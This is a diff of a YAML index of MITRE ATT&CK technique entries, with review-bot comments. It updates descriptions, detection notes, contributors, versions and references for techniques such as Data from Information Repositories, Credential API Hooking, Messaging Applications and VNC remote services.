- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -40981,41 +41578,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
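Review bot: the contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into two entries, `Naveen Vijayaraghavan` and `Nilesh Dherange (Gurucul)`, which moves the Gurucul affiliation to only the second name; confirm that is how upstream ATT&CK now lists them rather than a split on the comma. The three new citations in the rewritten description (`Mitiga`, `TrendMicro Exposed Redis 2020`, `Cybernews Reuters Leak 2022`) do each get a matching `external_references` entry later in the patch, so the description and reference list stay consistent.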
@@ -41044,10 +41652,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -41060,10 +41667,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -41072,11 +41689,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
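Review bot: the new `Cybernews Reuters Leak 2022` reference has a stray space before the period in the author field (`Vilius Petkauskas .`). If this is copied verbatim from the upstream ATT&CK data it is fine to leave as-is for fidelity; otherwise it should be corrected at the source the generator reads rather than by hand in this file.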
@@ -41113,7 +41733,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
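Review bot: the `modified` timestamp for T1602.001 also regresses, from `2021-04-29T14:49:39.188Z` to `2020-10-22T01:54:22.812Z`, and in the following hunk both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from this object without a replacement before `atomic_tests: []`, while `x_mitre_permissions_required: Administrator` is retained. The result is an object with no attack spec version at all, unlike the others in this patch that move to 3.2.0; the T1602.001 data should be regenerated from the same bundle as the rest of the file.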
@@ -41145,115 +41765,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
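Review bot: the `x_mitre_detection` text for T1056.004 (the `Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions ...` block) is deleted in this hunk and the only `x_mitre_detection` added is the empty string under the new T1213.005 entry, while four citations that text relied on (Zairon Hooking Dec 2006, EyeofRa Detecting Hooking June 2017, GMER Rootkits, MWRInfoSecurity Dynamic Hooking 2015) are removed without a matching `+` in the visible part of the hunk; please confirm they are re-emitted earlier in the same technique entry, otherwise T1056.004 has lost both its detection guidance and those four references. Separately, T1213.005 lands with `x_mitre_detection: ''` and `atomic_tests: []`, so the new Messaging Applications technique enters the index with no detection notes and no test, which is worth logging as a coverage gap rather than shipping silently. Minor: the Sentinel Labs citation description begins with a stray space (`" Jim Walter. (2024, July 16). ...`), inherited from upstream and harmless to YAML, but trimming it in the generator would keep the index clean.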
@@ -41264,6 +41951,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -41273,7 +41961,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -41289,66 +41976,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
